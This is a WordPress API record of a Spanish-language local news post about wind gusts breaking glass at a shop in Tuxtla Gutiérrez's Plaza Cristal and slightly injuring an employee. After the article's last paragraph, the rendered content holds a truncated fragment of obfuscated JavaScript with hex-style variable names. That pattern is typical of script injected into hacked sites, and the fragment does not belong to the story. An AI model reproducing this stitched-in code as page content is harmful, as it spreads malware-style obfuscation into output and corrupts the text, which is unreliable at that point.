{"id":4865,"date":"2022-09-06T23:28:42","date_gmt":"2022-09-06T23:28:42","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4865"},"modified":"2022-09-06T23:28:43","modified_gmt":"2022-09-06T23:28:43","slug":"rachas-de-vientos-causan-destrozos-en-plaza-comercial-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4865","title":{"rendered":"Rachas de vientos causan destrozos en plaza comercial de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"492\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1662506848718-492x1024.jpg\" alt=\"\" class=\"wp-image-4866\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1662506848718-492x1024.jpg 492w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1662506848718-144x300.jpg 144w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1662506848718-737x1536.jpg 737w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1662506848718.jpg 768w\" sizes=\"auto, (max-width: 492px) 100vw, 492px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 6 de septiembre del 2022. Tuxtla Guti\u00e9rrez.- Este martes las rachas fuertes de viento en la capital chiapaneca causaron destrozos en un comercio de la Plaza Cristal en la zona Poniente de Tuxtla Guti\u00e9rrez.Los reportes oficiales dieron a conocer que, este martes por la tarde y debido a las lluvias que acontecieron, un local comercial se vio afectado.A decir de los mismos empleados el viento corri\u00f3 tan fuerte que golpe\u00f3 unas l\u00e1minas y rompieron los vidrios.Un pedazo de vidrio cay\u00f3 en la espalda de una empleada.Param\u00e9dicos de Protecci\u00f3n Civil acudieron para acordonar el \u00e1rea as\u00ed como valorar a la empleada que result\u00f3 con un golpe menor.En el lugar se di\u00f3 a conocer que las lluvias con fuertes vientos continuar\u00e1n, por ello es necesario tomar precauciones en este mes de septiembre que es considerado como el m\u00e1s lluvioso del a\u00f1o.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 6 de septiembre del 2022. Tuxtla Guti\u00e9rrez.- Este martes las rachas fuertes de viento en la capital chiapaneca causaron destrozos en un comercio de la Plaza Cristal en la zona Poniente de Tuxtla Guti\u00e9rrez.Los reportes oficiales dieron a conocer que, este martes por la tarde y debido a las lluvias que acontecieron, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4866,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-4865","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4865","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4865"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4865\/revisions"}],"predecessor-version":[{"id":4867,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4865\/revisions\/4867"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4866"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4865"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4865"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4865"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}